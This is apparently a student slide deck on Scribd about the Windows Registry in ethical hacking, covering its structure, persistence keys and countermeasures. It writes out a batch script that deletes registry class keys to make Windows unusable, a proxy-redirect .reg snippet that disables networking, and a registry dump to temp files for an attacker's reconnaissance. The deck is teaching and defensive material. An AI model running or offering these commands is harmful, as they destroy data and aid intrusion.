Scribd
Upload
165 views20 pages

Windows Registry For Ethical Hacking

Uploaded by

isaac
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
165 views20 pages

Windows Registry For Ethical Hacking

Uploaded by

isaac
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 20

WINDOWS REGISTRY

FOR ETHICAL HACKING


GROUP 1
INTRODUCTION
The Windows Registry is a database that the Windows Operating System, as
well as the programs that run on Windows OS store their low-level data and
settings.

The Windows Registry is akin to the DNA of the Windows Operating


System.
INTRODUCTION

These settings and entries can be modified, created, or deleted


to cause changes to the behaviours of the Windows operating
System, as well as software that run within it.
This can be used by attackers to do reconnaissance, as well as to
cause direct damage to the target computer
INTRODUCTION
How to Access REGISTRY EDITOR
 Press Windows + R
 Type REGEDIT
 Press OK
INTRODUCTION
WINDOWS REGISTRY STRUCTURE
 HKEY_CLASSES_ROOT: holds information about the applications installed on
the system. Thisincludes things like file typeassociations.
 HKEY_CURRENT_USER: holds information about the user that is currently
logged in. Thisis actually just a link to the appropriate sub-key of
HKEY_USERS and contains all of the same information.
 HKEY_LOCAL_MACHINE: holds settings that apply to the entire local
computer. Thisis where the most interesting information, for our purposes, can
be found.
 HKEY_USERS: holds settings for all of the users of the local computer.
 HKEY_CURRENT_CONFIG: holds information gathered at startup about the
local computer. There is not much interesting information stored here.
VULNERABILITIES AND
COUNTERMEASURES

RecentDocs Key
If you suspect that your computer has been breached, the first thing
that you would want to know is if an unauthorized user has accessed
any of your sensitive files. You can find that out by accessing this
location:

HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Explorer\RecentDocs
VULNERABILITIES
THE RUN REGISTRY KEY:
The most-used location for hackers is this:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Run
This Registry key can be used to ensure a malicious software such as
key-loggers, spyware or even a rootkit runs at startup
VULNERABILITIES
THE RUN-ONCE REGISTRY KEY:
If you suspect that a file that only needs to run once during startup
infects your computer, you would most likely find the suspected file
here:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\RunOnce
VULNERABILITIES
STARTUP SERVICES:
This key can be used to disable certain security features within the
Windows Operating System, thereby making the computer vulnerable to
other attacks.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
VULNERABILITIES
DISABLE NETWORK CONNECTIVITY:
Network Connectivity can be disabled using the following code. It changes the computer’s
proxy setting to a local server, thereby sending all traffic to it.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\Connections]
"WinHttpSettings"=hex:18,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,\
00
"DefaultConnectionSettings"=hex:
"SavedLegacySettings"=hex:
VULNERABILITIES
A VIRUS THAT DELETES THE REGISTRY FILE:
A notepad file can be opened that enters the following code:

@ECHO OFF
START reg delete HKCR\.exe
START reg delete HKCR\.dll
START reg delete HKCR\*

the above code, when saved as an executable .bat file will delete the entire
Windows Registry file, thereby rendering the computer unusable. The only
solution would be to re-install the OS.
VULNERABILITIES
A VIRUS THAT DELETES THE REGISTRY FILE:
VULNERABILITIES
CREATING A REGISTRY DUMP FOR RECONNAISSANCE:
The following code creates a text file containing ALL settings and preferences,
software behaviour, logs, recent documents, all computer actions, recently typed
URLs, and much more, which can be remotely sent to an attacker.

if exist %temp%version.txt del /q %temp%\version.txt


regedit /e %temp%\version.txt "HKEY_LOCAL_MACHINE\"
start %temp%\version.txt
PACKAGE DELIVERY
A package containing malicious Registry files can be
easily done using a variety of methods.
For the sake of this Presentation, we’ll be using a
Trojan Horse approach, by attaching the payload to a
legitimate software.
Actual installer was used to create the payload.
PACKAGE DELIVERY
COUNTER-MEASURES
Disable Recent Documents History:

User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\


CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Policies\
Explorer]
Value Name: NoRecentDocsHistory
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = disable restriction, 1 = enable restriction)
COUNTER-MEASURES
 Do NOT grant administrative access to anyone on your
computer
 Do not open untrusted executable files or software on
your computer
 Conduct occasional search for strange startup apps
 Conduct periodic Anti-virus search
 Enable Real-time Protection to Prevent malicious code
from gaining access
CONCLUSION
In conclusion, Windows Registry is a potent tool both for
computer users and attackers.
It is therefore important to use Windows Registry responsibly
and not dabble into settings that you are unsure of its
functionality.
The limitation of Windows Registry Attacks however, is that it
is platform dependent, therefore it is impossible to initiate such
attacks on non-windows Operating Systems.
THANK YOU!

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy